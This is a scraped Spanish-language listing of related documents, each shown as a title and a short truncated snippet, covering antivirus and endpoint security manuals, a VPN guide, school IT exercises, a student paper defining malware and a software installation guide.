Ministerio de Educación, Cultura y Deporte. Aulas en Red. Windows. Módulo 6: Servicio Copias de seguridad Ministerio de Educación, Cultura y Deporte. Aulas en Red. Windows Módulo 6: Servicio Copias de seguridad Aulas en red. Aplicaciones y servicios. Windows Servicio Copias de Seguridad En este instante ya

Más detalles

Proporciona información sobre vulnerabilidades en los equipos: Carpetas compartidas, Riesgos Explotables por Worms, Trojanos, Backdoors entre otros.

Proporciona información sobre vulnerabilidades en los equipos: Carpetas compartidas, Riesgos Explotables por Worms, Trojanos, Backdoors entre otros. www.hauri-la.com ViRobot Intranet Security Management System Debido al crecimiento de Internet como medio de comunicación, la propagación de Malware y el desarrollo de tipos de ataques cada vez más sofisticados

Más detalles

Sophos Enterprise Console Ayuda

Sophos Enterprise Console Ayuda Sophos Enterprise Console Ayuda Versión: 5.2 Edición: enero de 2013 Contenido 1 Acerca de Enterprise Console...3 2 Descripción de la ventana de Enterprise Console...4 3 Empezar a usar Sophos Enterprise

Más detalles

Sophos Endpoint Security and Control Guía de inicio de usuario independiente

Sophos Endpoint Security and Control Guía de inicio de usuario independiente Sophos Endpoint Security and Control Guía de inicio de usuario independiente Sophos Endpoint Security and Control para Windows, versión 10.0 Sophos Anti-Virus para Mac OS X, versión 8 Edición: junio de

Más detalles

Averigua que antivirus usa el ordenador en el que estás trabajando (Panda, McAfee, VirusScan, Nod32...).

Averigua que antivirus usa el ordenador en el que estás trabajando (Panda, McAfee, VirusScan, Nod32...). TAREA 2. INVESTIGACIÓN Y CONSOLIDACIÓN Objetivo: concretar las amenazas descubiertas en la actividad anterior así como identificar las vulnerabilidades más frecuentes y establecer mecanismos para poder

Más detalles

Guía Rápida de Inicio

Guía Rápida de Inicio Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for Mail Servers. Para disponer de instrucciones detalladas, por favor, diríjase

Más detalles

9243059 Edición 1 ES. Nokia y Nokia Connecting People son marcas comerciales registradas de Nokia Corporation

9243059 Edición 1 ES. Nokia y Nokia Connecting People son marcas comerciales registradas de Nokia Corporation 9243059 Edición 1 ES Nokia y Nokia Connecting People son marcas comerciales registradas de Nokia Corporation Cliente de VPN Guía de usuario 9243059 Edición 1 Copyright 2005 Nokia. Reservados todos los

Más detalles

Manual de Usuario Pack Seguridad Total

Manual de Usuario Pack Seguridad Total Manual de Usuario Pack Seguridad Total Sitúe el cursor sobre la funcionalidad que desee consultar y pulse: Antivirus PC Anti Intrusos PC Canguro Net Filtro de Correo Electrónico olvidó sus datos de acceso?

Más detalles

Contenido. Práctica 1. Configuración de sistemas operativos. Vista clásica. Configuración y personalización

Contenido. Práctica 1. Configuración de sistemas operativos. Vista clásica. Configuración y personalización Práctica 1. Configuración de sistemas operativos Licenciado en Traducción e Interpretación Curso: 2010/2011 2 Configuración de sistemas operativos Configuración y personalización Panel de control Centro

Más detalles

ESPECIFICACIONES TÉCNICAS PARA LA ADQUISICIÓN DE UN SISTEMA ANTIVIRUS

ESPECIFICACIONES TÉCNICAS PARA LA ADQUISICIÓN DE UN SISTEMA ANTIVIRUS ESPECIFICACIONES TÉCNICAS PARA LA ADQUISICIÓN DE UN SISTEMA ANTIVIRUS LOTE DESCRIPCION Nº LICENCIAS /UNIDAD 1 Renovación de licencias 25.000 5,00 (Sin IVA) Para llevar a cabo el proyecto de instalación

Más detalles

RECUPERACION DE INFORMATICA GRADO 6

RECUPERACION DE INFORMATICA GRADO 6 INSTITUCION EDUCATIVA TECNICA INDUSTRIAL SIMÓN BOLÍVAR GUAMO TOLIMA NOMBRE: FECHA: RECUPERACION DE INFORMATICA GRADO 6 El presente modulo de trabajo tiene como objetivo proponer una herramienta de apoyo

Más detalles

ECBTI/Sur/Herramientas Teleinformáticas-221120. Malware. Hernando Arbey Robles Puentes. Neiva, 8 de Septiembre de 2014

ECBTI/Sur/Herramientas Teleinformáticas-221120. Malware. Hernando Arbey Robles Puentes. Neiva, 8 de Septiembre de 2014 ECBTI/Sur/Herramientas Teleinformáticas-221120 Malware Hernando Arbey Robles Puentes Neiva, 8 de Septiembre de 2014 Malvare Definición: Es un software malicioso creado con la intención de introducirse

Más detalles

Instalando y Activando Smaart v7

Instalando y Activando Smaart v7 Instalando y Activando Smaart v7 La instalación de Smaart v7 de Rational Acoustics en un proceso de dos partes. La primera es la instalación del software en sí y la segunda es el registro y activación

Más detalles